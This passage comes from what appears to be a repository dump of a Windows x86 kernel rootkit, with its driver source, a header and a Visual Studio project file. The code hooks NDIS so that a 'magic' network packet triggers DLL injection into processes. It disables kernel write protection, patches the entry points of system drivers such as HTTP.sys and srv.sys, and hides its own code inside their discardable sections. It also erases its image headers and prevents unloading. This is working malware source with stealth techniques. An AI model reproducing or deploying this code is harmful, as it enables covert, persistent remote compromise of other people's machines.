DbgMsg(__FUNCTION__\"(): Magic sequence has been find in network packet!\\n\");\r\n            \r\n            // we are at DPC level: create thread for 
execution of process injection code\r\n            HANDLE hThread = NULL;\r\n            NTSTATUS ns = PsCreateSystemThread(\r\n                &hThread, \r\n                THREAD_ALL_ACCESS, \r\n                NULL, NULL, NULL, \r\n                InjectPayloadThread, \r\n                NULL\r\n            );\r\n            if (NT_SUCCESS(ns))\r\n            {\r\n                ZwClose(hThread);\r\n            }\r\n            else\r\n            {\r\n                DbgMsg(\"PsCreateSystemThread() fails: 0x%.8x\\n\", ns);\r\n            }\r\n\r\n            break;\r\n        }\r\n    }    \r\n}\r\n//--------------------------------------------------------------------------------------\r\nVOID DriverEntryContinueThread(PVOID Param)\r\n{\r\n    /**\r\n     * Hidden rootkit code starts execution here.\r\n     */\r\n\r\n    LARGE_INTEGER Timeout = { 0 };\r\n    Timeout.QuadPart = TIME_RELATIVE(TIME_SECONDS(3));  \r\n\r\n    DbgPrint(__FUNCTION__\"(): Param = \"IFMT\"\\n\", Param);\r\n\r\n    // initialize NDIS hook data handler\r\n    NdisHookInitialize(NdisHookHandleBuffer);\r\n\r\n    // initialize DLL injector\r\n    InjectInitialize();\r\n\r\n    KeDelayExecutionThread(KernelMode, FALSE, &Timeout);\r\n\r\n    if (Param)\r\n    {\r\n        // free memory, that has been allocated for driver        \r\n        ExFreePool(Param);\r\n    }    \r\n\r\n#ifndef USE_STEALTH_IMAGE\r\n\r\n    if (m_DriverBase)\r\n    {\r\n        PIMAGE_NT_HEADERS pHeaders = (PIMAGE_NT_HEADERS)\r\n            ((PUCHAR)m_DriverBase + ((PIMAGE_DOS_HEADER)m_DriverBase)->e_lfanew);\r\n\r\n        // erase image headers\r\n        RtlZeroMemory(m_DriverBase, pHeaders->OptionalHeader.SizeOfHeaders);\r\n    }\r\n\r\n#endif // USE_STEALTH_IMAGE    \r\n\r\n#ifdef USE_GREETING_MESSAGE\r\n\r\n    while (true)\r\n    {\r\n        DbgPrint(__FUNCTION__\"(): Commertial malware rootkits are sucks!\\n\");\r\n\r\n        // sleep\r\n        KeDelayExecutionThread(KernelMode, FALSE, &Timeout);        
\r\n    }\r\n\r\n#endif // USE_GREETING_MESSAGE\r\n    \r\n}\r\n//--------------------------------------------------------------------------------------\r\nvoid DriverEntryInitializePayload(PUCHAR PointerFixup)\r\n{\r\n    /*\r\n        Perform payload initialization here\r\n    */\r\n    \r\n    NdisHookSet(PointerFixup);\r\n\r\n    // allocate memory for payload in non-paged pool\r\n    ULONG PayloadSize = sizeof(dll);\r\n    PVOID Payload = ExAllocatePool(NonPagedPool, PayloadSize);\r\n    if (Payload)\r\n    {\r\n        RtlCopyMemory(Payload, dll, sizeof(dll));\r\n\r\n        PULONG pPayloadSize = (PULONG)RECALCULATE_POINTER(&m_PayloadSize);\r\n        PVOID *pPayload = (PVOID *)RECALCULATE_POINTER(&m_Payload);\r\n\r\n        *pPayloadSize = PayloadSize;\r\n        *pPayload = Payload;\r\n    }\r\n    else\r\n    {\r\n        DbgMsg(\"ExAllocatePool() fails\\n\");\r\n    }\r\n}\r\n//--------------------------------------------------------------------------------------\r\n#ifdef _X86_\r\n//--------------------------------------------------------------------------------------\r\nvoid ClearWp(void)\r\n{\r\n    // allow to execute the code only on the 1-st CPU\r\n    KeSetSystemAffinityThread(0x00000001);\r\n\r\n    __asm\r\n    {              \r\n        mov     eax, cr0             \r\n        and     eax, not 000010000h\r\n        mov     cr0, eax\r\n    }\r\n}\r\n\r\nvoid SetWp(void)\r\n{\r\n    __asm\r\n    {\r\n        mov     eax, cr0\r\n        or      eax, 000010000h\r\n        mov     cr0, eax\r\n    }\r\n}\r\n//--------------------------------------------------------------------------------------\r\n#endif // _X86_\r\n//--------------------------------------------------------------------------------------\r\nPVOID DoPointerFixup(PVOID Ptr, PUCHAR PointerFixup)\r\n{\r\n\r\n#ifdef USE_STEALTH_IMAGE\r\n\r\n    if (m_DriverBase == NULL)\r\n    {\r\n        return Ptr;\r\n    }\r\n\r\n    return (PUCHAR)Ptr - (PUCHAR)m_DriverBase + PointerFixup;\r\n\r\n#else 
// USE_STEALTH_IMAGE\r\n\r\n    return Ptr;\r\n\r\n#endif //USE_STEALTH_IMAGE\r\n\r\n}\r\n//--------------------------------------------------------------------------------------\r\nNTSTATUS NewDriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)\r\n{    \r\n    // disable memory write protection\r\n    ClearWp();\r\n\r\n    // restore original code from image entry point\r\n    memcpy(m_HookedEntry, m_EpOriginalBytes, EP_PATCH_SIZE);\r\n\r\n    // enable memory write protection\r\n    SetWp();\r\n\r\n    NTSTATUS ns = m_HookedEntry(DriverObject, RegistryPath);\r\n    DbgMsg(__FUNCTION__\"(): Hooked driver returns 0x%.8x\\n\", ns);    \r\n\r\n    if (PsRemoveLoadImageNotifyRoutine(LoadImageNotify) == STATUS_SUCCESS)\r\n    {\r\n        m_bDriverMustBeFreed = TRUE;\r\n    }\r\n\r\n    if (NT_SUCCESS(ns))\r\n    {\r\n        PVOID Image = ExAllocatePool(NonPagedPool, m_DriverSize);\r\n        if (Image)\r\n        {\r\n            // prepare rootkit code for injection into the discardable sections\r\n            memcpy(Image, m_DriverBase, m_DriverSize);\r\n            RuntimeProcessRelocs(Image, (PVOID)((PUCHAR)m_FreeAreaFound - m_RkOffset));\r\n\r\n            // disable memory write protection\r\n            ClearWp();\r\n\r\n            memcpy(m_FreeAreaFound, RVATOVA(Image, m_RkOffset), m_RkSize);\r\n\r\n            // enable memory write protection\r\n            SetWp();\r\n\r\n            PUCHAR PointerFixup = (PUCHAR)m_FreeAreaFound - m_RkOffset;\r\n\r\n            // set up NDIS hooks\r\n            DriverEntryInitializePayload(PointerFixup);\r\n\r\n            PKSTART_ROUTINE Start = (PKSTART_ROUTINE)RECALCULATE_POINTER(DriverEntryContinueThread);\r\n\r\n            DbgMsg(__FUNCTION__\"(): Start address: \"IFMT\"\\n\", Start);\r\n\r\n            // create thread for execution copied code\r\n            HANDLE hThread = NULL;\r\n            ns = PsCreateSystemThread(\r\n                &hThread, \r\n                THREAD_ALL_ACCESS, \r\n 
               NULL, NULL, NULL, \r\n                Start, \r\n                m_bDriverMustBeFreed ? m_DriverBase : NULL\r\n            );\r\n            if (NT_SUCCESS(ns))\r\n            {\r\n                ZwClose(hThread);\r\n            }\r\n            else\r\n            {\r\n                DbgMsg(\"PsCreateSystemThread() fails: 0x%.8x\\n\", ns);\r\n            }\r\n\r\n            ExFreePool(Image);\r\n        }\r\n\r\n        // don't allow to unload target driver\r\n        DriverObject->DriverUnload = NULL;\r\n    }\r\n\r\n    return ns;\r\n}\r\n//--------------------------------------------------------------------------------------\r\nvoid HookImageEntry(PVOID Image)\r\n{\r\n    PIMAGE_NT_HEADERS32 pHeaders = (PIMAGE_NT_HEADERS32)\r\n        ((PUCHAR)Image + ((PIMAGE_DOS_HEADER)Image)->e_lfanew);\r\n\r\n    PUCHAR Entry = (PUCHAR)RVATOVA(Image, pHeaders->OptionalHeader.AddressOfEntryPoint);\r\n\r\n    // save original code from image entry point\r\n    memcpy(m_EpOriginalBytes, Entry, EP_PATCH_SIZE);\r\n    m_HookedEntry = (DRIVER_INITIALIZE *)Entry;\r\n\r\n    // disable memory write protection\r\n    ClearWp();\r\n\r\n#ifdef _X86_\r\n\r\n    // patch image entry point\r\n    *(PUCHAR)(Entry + 0) = 0x68;\r\n    *(PVOID*)(Entry + 1) = NewDriverEntry;\r\n    *(PUCHAR)(Entry + 5) = 0xC3;\r\n\r\n#else // _X86_\r\n\r\n#error __FUNCTION__ is x86 only\r\n\r\n#endif // _X86_\r\n\r\n    // enable memory write protection\r\n    SetWp();\r\n\r\n    DbgMsg( \r\n        __FUNCTION__\"(): Image entry point hooked (\"IFMT\" -> \"IFMT\")\\n\",\r\n        Entry, NewDriverEntry\r\n    );\r\n}\r\n//--------------------------------------------------------------------------------------\r\nBOOLEAN CheckForFreeArea(PVOID Image, PULONG FreeAreaRVA, PULONG FreeAreaLength)\r\n{\r\n    *FreeAreaRVA = NULL;\r\n    *FreeAreaLength = 0;\r\n\r\n    PIMAGE_NT_HEADERS32 pHeaders = (PIMAGE_NT_HEADERS32)\r\n        ((PUCHAR)Image + ((PIMAGE_DOS_HEADER)Image)->e_lfanew);\r\n\r\n    
PIMAGE_SECTION_HEADER pSection = (PIMAGE_SECTION_HEADER)\r\n        (pHeaders->FileHeader.SizeOfOptionalHeader + \r\n        (PUCHAR)&pHeaders->OptionalHeader);\r\n\r\n    ULONG AreaRVA = NULL;\r\n    ULONG AreaLength = 0;\r\n\r\n    // enumerate image sections\r\n    for (ULONG i = 0; i < pHeaders->FileHeader.NumberOfSections; i++)\r\n    {            \r\n        PVOID SectionVa = RVATOVA(Image, pSection->VirtualAddress);\r\n        char szSectionName[IMAGE_SIZEOF_SHORT_NAME + 1];\r\n\r\n        // check for discardable attribute\r\n        if ((pSection->Characteristics & IMAGE_SCN_MEM_DISCARDABLE) &&\r\n            my_strcmp(szSectionName, \"INIT\"))\r\n        {            \r\n            if (AreaRVA && pSection->VirtualAddress == AreaRVA + AreaLength)\r\n            {\r\n                // concatenate with the previously found section\r\n                AreaLength += MY_ALIGN_UP(pSection->Misc.VirtualSize, pHeaders->OptionalHeader.SectionAlignment);\r\n            }\r\n            else\r\n            {\r\n                AreaRVA = pSection->VirtualAddress;\r\n                AreaLength = MY_ALIGN_UP(pSection->Misc.VirtualSize, pHeaders->OptionalHeader.SectionAlignment);\r\n            }            \r\n        }\r\n\r\n        pSection += 1;\r\n    }\r\n\r\n    if (AreaLength >= m_RkSize)\r\n    {\r\n        DbgMsg(\"%d free bytes at 0x%.8x\\n\", AreaLength, AreaRVA);\r\n\r\n        *FreeAreaRVA = AreaRVA;\r\n        *FreeAreaLength = AreaLength;\r\n\r\n        pSection = (PIMAGE_SECTION_HEADER)\r\n            (pHeaders->FileHeader.SizeOfOptionalHeader + \r\n            (PUCHAR)&pHeaders->OptionalHeader);\r\n\r\n        // erase discardable flag\r\n        for (ULONG i = 0; i < pHeaders->FileHeader.NumberOfSections; i++)\r\n        {\r\n            pSection->Characteristics &= ~IMAGE_SCN_MEM_DISCARDABLE;\r\n            pSection += 1;\r\n        }\r\n\r\n        return TRUE;\r\n    }    \r\n\r\n    return 
FALSE;\r\n}\r\n//--------------------------------------------------------------------------------------\r\n/*\r\nkd> kb\r\nChildEBP RetAddr  Args to Child              \r\nf8afdaa8 805c62ae f8afdcf0 00000000 f8afdb44 DrvHide!LoadImageNotify+0x10\r\nf8afdac8 805a4159 f8afdcf0 00000000 f8afdb44 nt!PsCallImageNotifyRoutines+0x36\r\nf8afdc6c 80576483 f8afdcf0 00000000 00000000 nt!MmLoadSystemImage+0x9e5\r\nf8afdd4c 8057688f 80000378 00000001 00000000 nt!IopLoadDriver+0x371\r\nf8afdd74 80534c02 80000378 00000000 823c63c8 nt!IopLoadUnloadDriver+0x45\r\nf8afddac 805c6160 b286ecf4 00000000 00000000 nt!ExpWorkerThread+0x100\r\nf8afdddc 80541dd2 80534b02 00000001 00000000 nt!PspSystemThreadStartup+0x34\r\n00000000 00000000 00000000 00000000 00000000 nt!KiThreadStartup+0x16\r\n*/\r\n\r\n// images for storing malicious code\r\nPWSTR m_Images[] = \r\n{\r\n    L\"\\\\HTTP.sys\",\r\n    L\"\\\\mrxsmb.sys\",\r\n    L\"\\\\mrxsmb10.sys\",\r\n    L\"\\\\mrxsmb20.sys\",\r\n    L\"\\\\srv.sys\",\r\n    L\"\\\\srv2.sys\",\r\n    L\"\\\\secdrv.sys\"\r\n};\r\n\r\nVOID LoadImageNotify(\r\n   PUNICODE_STRING FullImageName,\r\n   HANDLE ProcessId, // where image is mapped\r\n   PIMAGE_INFO ImageInfo)\r\n{\r\n    if (m_FreeAreaFound)\r\n    {\r\n        return;\r\n    }\r\n\r\n    // check for kernel driver\r\n    if (ProcessId == 0 && ImageInfo->SystemModeImage)\r\n    {        \r\n        BOOLEAN bImageFound = FALSE;\r\n        PVOID TargetImageBase = ImageInfo->ImageBase;\r\n        ULONG TargetImageSize = ImageInfo->ImageSize;\r\n\r\n        DbgMsg(\r\n            __FUNCTION__\"(): '%wZ' is at \"IFMT\", size=%d\\n\", \r\n            FullImageName, TargetImageBase, TargetImageSize\r\n        );\r\n\r\n        // check for the known image\r\n        for (ULONG i = 0; i < sizeof(m_Images) / sizeof(PWSTR); i++)\r\n        {\r\n            UNICODE_STRING usName;\r\n            RtlInitUnicodeString(&usName, m_Images[i]);\r\n\r\n            if (EqualUnicodeString_r(FullImageName, &usName, 
TRUE))\r\n            {\r\n                bImageFound = TRUE;\r\n                break;\r\n            }\r\n        }\r\n\r\n        if (bImageFound)\r\n        {\r\n            // check for the free space in image discardable sections\r\n            ULONG FreeAreaRVA = 0, FreeAreaLength = 0;\r\n            if (CheckForFreeArea(TargetImageBase, &FreeAreaRVA, &FreeAreaLength))\r\n            {\r\n                // copy malicious code into this image\r\n                m_FreeAreaFound = RVATOVA(TargetImageBase, FreeAreaRVA);\r\n                HookImageEntry(TargetImageBase);\r\n            }\r\n        }        \r\n    }\r\n}\r\n//--------------------------------------------------------------------------------------\r\nNTSTATUS \r\nNTAPI\r\nDriverEntry(\r\n    PDRIVER_OBJECT  DriverObject,\r\n    PUNICODE_STRING RegistryPath)\r\n{\r\n    if (!RuntimeInitialize(DriverObject, RegistryPath))\r\n    {\r\n        return STATUS_UNSUCCESSFUL;\r\n    }\r\n\r\n    DbgMsg(__FUNCTION__\"(): Loaded at \"IFMT\"\\n\", m_DriverBase);\r\n\r\n    // initialize NDIS structures offsets\r\n    NdisHookInitialize(NULL);\r\n\r\n#ifdef USE_STEALTH_IMAGE\r\n\r\n    if (m_DriverBase == NULL)\r\n    {\r\n        return STATUS_UNSUCCESSFUL;\r\n    }\r\n\r\n    PIMAGE_NT_HEADERS32 pHeaders = (PIMAGE_NT_HEADERS32)((PUCHAR)m_DriverBase + \r\n        ((PIMAGE_DOS_HEADER)m_DriverBase)->e_lfanew);\r\n\r\n    PIMAGE_SECTION_HEADER pSection = (PIMAGE_SECTION_HEADER)\r\n        (pHeaders->FileHeader.SizeOfOptionalHeader + \r\n        (PUCHAR)&pHeaders->OptionalHeader);\r\n\r\n    // calculate size, that require for rootkit code\r\n    for (ULONG i = 0; i < pHeaders->FileHeader.NumberOfSections; i++)\r\n    {            \r\n        if (m_RkOffset == 0)\r\n        {\r\n            m_RkOffset = pSection->VirtualAddress;\r\n        }\r\n\r\n        if (pSection->Characteristics & IMAGE_SCN_MEM_DISCARDABLE)\r\n        {\r\n            // erase discardable flag from our driver sections\r\n            
pSection->Characteristics &= ~IMAGE_SCN_MEM_DISCARDABLE;\r\n        }\r\n        else\r\n        {\r\n            m_RkSize += MY_ALIGN_UP(\r\n                pSection->Misc.VirtualSize, \r\n                pHeaders->OptionalHeader.SectionAlignment\r\n            );\r\n        }\r\n        \r\n        pSection += 1;\r\n    }\r\n\r\n    DbgMsg(\"Rootkit code: 0x%x bytes from 0x%.8x\\n\", m_RkSize, m_RkOffset);\r\n\r\n    // to deal with ProcessRelocs()\r\n    pHeaders->OptionalHeader.ImageBase = (ULONG)m_DriverBase;\r\n    m_DriverSize = pHeaders->OptionalHeader.SizeOfImage;\r\n\r\n    NTSTATUS ns = PsSetLoadImageNotifyRoutine(LoadImageNotify);\r\n    if (!NT_SUCCESS(ns))\r\n    {\r\n        DbgMsg(\"PsSetLoadImageNotifyRoutine() fails: 0x%.8x\\n\", ns);\r\n    }\r\n\r\n#else // USE_STEALTH_IMAGE\r\n\r\n    DriverEntryInitializePayload(NULL);   \r\n\r\n    HANDLE hThread = NULL;\r\n    NTSTATUS ns = PsCreateSystemThread(\r\n        &hThread, \r\n        THREAD_ALL_ACCESS, \r\n        NULL, NULL, NULL, \r\n        DriverEntryContinueThread, \r\n        NULL\r\n    );\r\n    if (NT_SUCCESS(ns))\r\n    {\r\n        ZwClose(hThread);\r\n    }\r\n    else\r\n    {\r\n        DbgMsg(\"PsCreateSystemThread() fails: 0x%.8x\\n\", ns);\r\n    }\r\n\r\n#endif // USE_STEALTH_IMAGE\r\n\r\n    return STATUS_SUCCESS;\r\n}\r\n//--------------------------------------------------------------------------------------\r\n// EoF\r\n"
  },
  {
    "path": "src/rootkit_driver/rootkit_driver.def",
    "content": ""
  },
  {
    "path": "src/rootkit_driver/rootkit_driver.h",
    "content": "\r\nextern \"C\"\r\n{\r\n    void ClearWp(void);\r\n    void SetWp(void);\r\n\r\n    PVOID DoPointerFixup(PVOID Ptr, PUCHAR PointerFixup);\r\n}\r\n\r\n#define RECALCULATE_POINTER(_ptr_) DoPointerFixup((PVOID)(_ptr_), PointerFixup)\r\n"
  },
  {
    "path": "src/rootkit_driver/rootkit_driver.vcproj",
    "content": "<?xml version=\"1.0\" encoding=\"windows-1251\"?>\r\n<VisualStudioProject\r\n\tProjectType=\"Visual C++\"\r\n\tVersion=\"9,00\"\r\n\tName=\"rootkit_driver\"\r\n\tProjectGUID=\"{3EEAAF60-1BCB-4114-8B75-168421CD9253}\"\r\n\tKeyword=\"Win32Proj\"\r\n\tTargetFrameworkVersion=\"131072\"\r\n\t>\r\n\t<Platforms>\r\n\t\t<Platform\r\n\t\t\tName=\"Win32\"\r\n\t\t/>\r\n\t</Platforms>\r\n\t<ToolFiles>\r\n\t</ToolFiles>\r\n\t<Configurations>\r\n\t\t<Configuration\r\n\t\t\tName=\"Debug|Win32\"\r\n\t\t\tOutputDirectory=\"Debug\"\r\n\t\t\tIntermediateDirectory=\"Debug\"\r\n\t\t\tConfigurationType=\"2\"\r\n\t\t\tInheritedPropertySheets=\"$(VCInstallDir)VCProjectDefaults\\UpgradeFromVC71.vsprops\"\r\n\t\t\tCharacterSet=\"2\"\r\n\t\t\t>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCPreBuildEventTool\"\r\n\t\t\t\tCommandLine=\"\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCCustomBuildTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCXMLDataGeneratorTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCWebServiceProxyGeneratorTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCMIDLTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCCLCompilerTool\"\r\n\t\t\t\tAdditionalOptions=\"/D _X86_ /D DBGMSG /D 
WIN32_WINNT=0x0600\"\r\n\t\t\t\tOptimization=\"0\"\r\n\t\t\t\tAdditionalIncludeDirectories=\"$(ProjectDir)\"\r\n\t\t\t\tPreprocessorDefinitions=\"WIN32;_DEBUG;_WINDOWS\"\r\n\t\t\t\tMinimalRebuild=\"true\"\r\n\t\t\t\tExceptionHandling=\"0\"\r\n\t\t\t\tBasicRuntimeChecks=\"0\"\r\n\t\t\t\tRuntimeLibrary=\"0\"\r\n\t\t\t\tBufferSecurityCheck=\"false\"\r\n\t\t\t\tUsePrecompiledHeader=\"0\"\r\n\t\t\t\tWarningLevel=\"3\"\r\n\t\t\t\tDetect64BitPortabilityProblems=\"false\"\r\n\t\t\t\tDebugInformationFormat=\"3\"\r\n\t\t\t\tCallingConvention=\"2\"\r\n\t\t\t\tDisableSpecificWarnings=\"4996\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCManagedResourceCompilerTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCResourceCompilerTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCPreLinkEventTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCLinkerTool\"\r\n\t\t\t\tAdditionalOptions=\"/ENTRY:DriverEntry /DEF:rootkit_driver.def /ALIGN:0x80\"\r\n\t\t\t\tAdditionalDependencies=\"ntoskrnl.lib ndis.lib\"\r\n\t\t\t\tOutputFile=\"$(OutDir)/../../$(ProjectName)_debug.sys\"\r\n\t\t\t\tLinkIncremental=\"0\"\r\n\t\t\t\tGenerateManifest=\"false\"\r\n\t\t\t\tGenerateDebugInformation=\"true\"\r\n\t\t\t\tProgramDatabaseFile=\"$(OutDir)/../../$(ProjectName)_debug.pdb\"\r\n\t\t\t\tSubSystem=\"3\"\r\n\t\t\t\tDriver=\"1\"\r\n\t\t\t\tOptimizeForWindows98=\"0\"\r\n\t\t\t\tRandomizedBaseAddress=\"0\"\r\n\t\t\t\tFixedBaseAddress=\"1\"\r\n\t\t\t\tDataExecutionPrevention=\"0\"\r\n\t\t\t\tTargetMachine=\"1\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCALinkTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCManifestTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCXDCMakeTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCBscMakeTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCFxCopTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCAppVerifierTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCPostBuildEventTool\"\r\n\t\t\t\tCommandLine=\"post_build.bat\"\r\n\t\t\t/>\r\n\t\t</
Configuration>\r\n\t\t<Configuration\r\n\t\t\tName=\"Release|Win32\"\r\n\t\t\tOutputDirectory=\"Release\"\r\n\t\t\tIntermediateDirectory=\"Release\"\r\n\t\t\tConfigurationType=\"1\"\r\n\t\t\tInheritedPropertySheets=\"$(VCInstallDir)VCProjectDefaults\\UpgradeFromVC71.vsprops\"\r\n\t\t\tCharacterSet=\"2\"\r\n\t\t\t>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCPreBuildEventTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCCustomBuildTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCXMLDataGeneratorTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCWebServiceProxyGeneratorTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCMIDLTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCCLCompilerTool\"\r\n\t\t\t\tAdditionalOptions=\"/D _X86_\"\r\n\t\t\t\tOptimization=\"0\"\r\n\t\t\t\tAdditionalIncludeDirectories=\"$(ProjectDir)\"\r\n\t\t\t\tPreprocessorDefinitions=\"WIN32;NDEBUG;_WINDOWS\"\r\n\t\t\t\tRuntimeLibrary=\"0\"\r\n\t\t\t\tBufferSecurityCheck=\"false\"\r\n\t\t\t\tUsePrecompiledHeader=\"0\"\r\n\t\t\t\tWarningLevel=\"3\"\r\n\t\t\t\tDetect64BitPortabilityProblems=\"false\"\r\n\t\t\t\tDebugInformationFormat=\"3\"\r\n\t\t\t\tCallingConvention=\"2\"\r\n\t\t\t\tDisableSpecificWarnings=\"4996\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCManagedResourceCompilerTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCResourceCompilerTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCPreLinkEventTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCLinkerTool\"\r\n\t\t\t\tAdditionalOptions=\"/ENTRY:DriverEntry\"\r\n\t\t\t\tAdditionalDependencies=\"ntoskrnl.lib 
hal.lib\"\r\n\t\t\t\tOutputFile=\"$(OutDir)/../../$(ProjectName).sys\"\r\n\t\t\t\tLinkIncremental=\"1\"\r\n\t\t\t\tGenerateManifest=\"false\"\r\n\t\t\t\tGenerateDebugInformation=\"false\"\r\n\t\t\t\tSubSystem=\"3\"\r\n\t\t\t\tDriver=\"1\"\r\n\t\t\t\tOptimizeReferences=\"2\"\r\n\t\t\t\tEnableCOMDATFolding=\"2\"\r\n\t\t\t\tOptimizeForWindows98=\"0\"\r\n\t\t\t\tRandomizedBaseAddress=\"0\"\r\n\t\t\t\tFixedBaseAddress=\"1\"\r\n\t\t\t\tDataExecutionPrevention=\"0\"\r\n\t\t\t\tTargetMachine=\"1\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCALinkTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCManifestTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCXDCMakeTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCBscMakeTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCFxCopTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCAppVerifierTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCPostBuildEventTool\"\r\n\t\t\t/>\r\n\t\t</Configuration>\r\n\t</Configurations>\r\n\t<References>\r\n\t</References>\r\n\t<Files>\r\n\t\t<Filter\r\n\t\t\tName=\"Source Files\"\r\n\t\t\tFilter=\"cpp;c;cxx;def;odl;idl;hpj;bat;asm;asmx\"\r\n\t\t\tUniqueIdentifier=\"{4FC737F1-C7A5-4376-A066-2A32D752A2FF}\"\r\n\t\t\t>\r\n\t\t\t<File\r\n\t\t\t\tRelativePath=\".\\bogusproto.cpp\"\r\n\t\t\t\t>\r\n\t\t\t</File>\r\n\t\t\t<File\r\n\t\t\t\tRelativePath=\".\\dll_inject.cpp\"\r\n\t\t\t\t>\r\n\t\t\t</File>\r\n\t\t\t<File\r\n\t\t\t\tRelativePath=\".\\ndis_hook.cpp\"\r\n\t\t\t\t>\r\n\t\t\t</File>\r\n\t\t\t<File\r\n\t\t\t\tRelativePath=\".\\network.cpp\"\r\n\t\t\t\t>\r\n\t\t\t</File>\r\n\t\t\t<File\r\n\t\t\t\tRelativePath=\".\\rootkit_driver.cpp\"\r\n\t\t\t\t>\r\n\t\t\t</File>\r\n\t\t\t<File\r\n\t\t\t\tRelativePath=\".\\runtime.cpp\"\r\n\t\t\t\t>\r\n\t\t\t</File>\r\n\t\t</Filter>\r\n\t\t<Filter\r\n\t\t\tName=\"Header 
Files\"\r\n\t\t\tFilter=\"h;hpp;hxx;hm;inl;inc;xsd\"\r\n\t\t\tUniqueIdentifier=\"{93995380-89BD-4b04-88EB-625FBE52EBFB}\"\r\n\t\t\t>\r\n\t\t\t<File\r\n\t\t\t\tRelativePath=\".\\bogusproto.h\"\r\n\t\t\t\t>\r\n\t\t\t</File>\r\n\t\t\t<File\r\n\t\t\t\tRelativePath=\".\\debug.h\"\r\n\t\t\t\t>\r\n\t\t\t</File>\r\n\t\t\t<File\r\n\t\t\t\tRelativePath=\".\\dll_inject.h\"\r\n\t\t\t\t>\r\n\t\t\t</File>\r\n\t\t\t<File\r\n\t\t\t\tRelativePath=\".\\dll_inject_shellcode.h\"\r\n\t\t\t\t>\r\n\t\t\t</File>\r\n\t\t\t<File\r\n\t\t\t\tRelativePath=\".\\ndis_hook.h\"\r\n\t\t\t\t>\r\n\t\t\t</File>\r\n\t\t\t<File\r\n\t\t\t\tRelativePath=\".\\network.h\"\r\n\t\t\t\t>\r\n\t\t\t</File>\r\n\t\t\t<File\r\n\t\t\t\tRelativePath=\".\\rootkit_driver.h\"\r\n\t\t\t\t>\r\n\t\t\t</File>\r\n\t\t\t<File\r\n\t\t\t\tRelativePath=\".\\runtime.h\"\r\n\t\t\t\t>\r\n\t\t\t</File>\r\n\t\t\t<File\r\n\t\t\t\tRelativePath=\".\\stdafx.h\"\r\n\t\t\t\t>\r\n\t\t\t</File>\r\n\t\t\t<File\r\n\t\t\t\tRelativePath=\".\\undocnt.h\"\r\n\t\t\t\t>\r\n\t\t\t</File>\r\n\t\t</Filter>\r\n\t\t<Filter\r\n\t\t\tName=\"Resource Files\"\r\n\t\t\tFilter=\"rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx\"\r\n\t\t\tUniqueIdentifier=\"{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}\"\r\n\t\t\t>\r\n\t\t</Filter>\r\n\t</Files>\r\n\t<Globals>\r\n\t</Globals>\r\n</VisualStudioProject>\r\n"
  },
  {
    "path": "src/rootkit_driver/runtime.cpp",
    "content": "#include \"stdafx.h\"\r\n#include \"../common/shellcode2_struct.h\"\r\n\r\n#pragma alloc_text(INIT, my_strlen)\r\n#pragma alloc_text(INIT, my_strcmp)\r\n#pragma alloc_text(INIT, my_strcpy)\r\n#pragma alloc_text(INIT, my_strlwr)\r\n#pragma alloc_text(INIT, chrlwr_w)\r\n#pragma alloc_text(INIT, EqualUnicodeString_r)\r\n#pragma alloc_text(INIT, RuntimeGetExportAddress)\r\n#pragma alloc_text(INIT, RuntimeGetKernelModuleBase)\r\n#pragma alloc_text(INIT, RuntimeProcessImports)\r\n#pragma alloc_text(INIT, RuntimeInitialize)\r\n\r\n#define MAX_IMAGE_NAME_LEN 255\r\n\r\nPVOID m_KernelBase = NULL, m_DriverBase = NULL;\r\n//--------------------------------------------------------------------------------------\r\n/**\r\n * Implementations of some standard C library functions.\r\n 